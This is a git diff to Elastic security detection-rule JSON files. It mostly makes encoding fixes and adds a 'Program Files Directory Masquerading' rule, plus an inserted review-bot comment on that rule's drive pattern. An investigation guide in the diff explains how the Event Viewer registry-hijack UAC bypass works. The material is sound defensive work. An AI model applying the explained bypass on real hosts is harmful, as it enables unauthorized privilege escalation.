concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE 
'%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n", "related_integrations": [ { 
@@ -50,7 +50,7 @@
 ],
 "risk_score": 73,
 "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -86,7 +86,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/3202e172-01b1-4738-a932-d024c514ba72_103.json b/packages/security_detection_engine/kibana/security_rule/3202e172-01b1-4738-a932-d024c514ba72_103.json
index fff4d415f25..97c42bf176f 100644
--- a/packages/security_detection_engine/kibana/security_rule/3202e172-01b1-4738-a932-d024c514ba72_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/3202e172-01b1-4738-a932-d024c514ba72_103.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/3202e172-01b1-4738-a932-d024c514ba72_104.json b/packages/security_detection_engine/kibana/security_rule/3202e172-01b1-4738-a932-d024c514ba72_104.json
index 74054fc25ea..b1ca57a5d3d 100644
--- a/packages/security_detection_engine/kibana/security_rule/3202e172-01b1-4738-a932-d024c514ba72_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/3202e172-01b1-4738-a932-d024c514ba72_104.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_101.json b/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_101.json
index c8b5c37991e..4de912b023e 100644
--- a/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_101.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_102.json b/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_102.json
index 8a68b369ab8..ad1c34e6456 100644
--- a/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_102.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_100.json b/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_100.json
index 8439c128e07..4e5a3672854 100644
--- a/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_100.json
+++ b/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_100.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_101.json b/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_101.json
index 2ada57b08b4..bb8947f80e4 100644
--- a/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_101.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_102.json b/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_102.json
index 37e360b35c0..fda9e10705b 100644
--- a/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_102.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_103.json b/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_103.json
index 2761d0084a0..24f9b96b6af 100644
--- a/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/32923416-763a-4531-bb35-f33b9232ecdb_103.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_103.json b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_103.json
index cc9daf663f7..f902fed3183 100644
--- a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_103.json
@@ -45,7 +45,7 @@
 ],
 "risk_score": 47,
 "rule_id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_104.json b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_104.json
index a7e9f239006..8e5f0ec802f 100644
--- a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_104.json
@@ -45,7 +45,7 @@
 ],
 "risk_score": 47,
 "rule_id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_105.json b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_105.json
index d3059ad2650..3149481f2d7 100644
--- a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_105.json
@@ -45,7 +45,7 @@
 ],
 "risk_score": 47,
 "rule_id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_106.json b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_106.json
index 3c490b799b3..30642820a85 100644
--- a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_106.json
@@ -44,7 +44,7 @@
 ],
 "risk_score": 47,
 "rule_id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_107.json b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_107.json
new file mode 100644
index 00000000000..5ff146ee717
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_107.json
@@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution from a directory masquerading as the Windows Program Files directories. These paths are trusted and usually host trusted third party programs. An adversary may leverage masquerading, along with low privileges to bypass detections allowlisting those folders.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Program Files Directory Masquerading", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.executable : \"C:\\\\*Program*Files*\\\\*.exe\" and\n not process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Downloaded Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\.opera\\\\????????????\\\\CProgram?FilesOpera*\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\.opera\\\\????????????\\\\CProgram?Files?(x86)Opera*\\\\*.exe\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom 
ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_104.json b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_104.json index 3b69ff52df3..befc66907cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_104.json +++ b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_104.json 
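Review bot: The positive match in the new rule's `query` is pinned to the `C:` drive (`process.executable : "C:\\*Program*Files*\\*.exe"`) while every exclusion in the `not process.executable : (...)` list uses the drive wildcard `?:`, so executions from any other volume are never evaluated even though the exclusion list was written drive-agnostically. Unless the `C:` restriction is deliberate, the inclusion should read `process.executable : "?:\\*Program*Files*\\*.exe"` to match the exclusions; if it is deliberate, the exclusions could be narrowed to `C:` for consistency. The `?:\\Users\\*.exe` and `?:\\ProgramData\\*.exe` exclusions also appear broader than the other entries — they suppress any match under those trees rather than a specific look-alike directory — which is presumably for false-positive reduction but is worth confirming and recording. This rule version also carries no `note` investigation guide, unlike the UAC-bypass rule earlier in this diff; a short triage section describing how to validate the executable's true location and signature would help analysts act on the alert.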
@@ -50,7 +50,7 @@
 ],
 "risk_score": 21,
 "rule_id": "32f4675e-6c49-4ace-80f9-97c9259dca2e",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_105.json b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_105.json
index 2334347f079..e77d667cf91 100644
--- a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_105.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 21,
 "rule_id": "32f4675e-6c49-4ace-80f9-97c9259dca2e",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_106.json b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_106.json
index 4414abf452c..07188742b3e 100644
--- a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_106.json
@@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "32f4675e-6c49-4ace-80f9-97c9259dca2e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_107.json b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_107.json index b7b41c1d7b1..d922b723dbf 100644 --- a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_107.json +++ b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_107.json 
@@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "32f4675e-6c49-4ace-80f9-97c9259dca2e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_108.json b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_108.json index 826d783a476..2d90aac2aaa 100644 --- a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_108.json +++ b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_108.json 
@@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "32f4675e-6c49-4ace-80f9-97c9259dca2e", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git 